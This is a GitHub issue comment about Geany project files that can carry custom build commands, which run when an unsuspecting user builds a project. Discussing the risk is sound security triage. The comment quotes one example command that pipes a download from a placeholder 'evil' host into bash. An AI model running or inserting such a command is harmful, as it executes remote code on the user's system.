CVE-Hunter-Leo left a comment (geany/geany#4610)

Thanks for the comment. Yeah, you're right. If an attacker can put whatever they want into the build command field in the .geany file, then using execve instead of a shell doesn't really change much — they can just do `sh -c 'make; curl evil | bash'` or hide the payload in a Makefile. What I was trying to point out is that project files can silently carry these custom commands. So if someone opens a project they didn't create themselves and hits build, it can end up running commands without it being immediately obvious.

A few things I'm wondering:

1) When a project loads and overrides the default build commands, does Geany show any kind of warning or prompt to review them?
2) Are build commands only ever run when the user explicitly triggers them, or is there any automatic execution on project load?
3) Just out of curiosity, how does Geany actually execute these commands right now? Does it go through `/bin/sh -c` or use something like `g_spawn_async` with an argv array?

If the maintainers see this as expected behaviour (similar to running make on an untrusted Makefile), I'm happy to update the issue and remove the CVE request. I mainly wanted to check whether there's any simple defense-in-depth improvement worth adding, like a warning when custom commands are present. Appreciate your thoughts and feedback.

View it on GitHub: https://github.com/geany/geany/issues/4610#issuecomment-4830889731
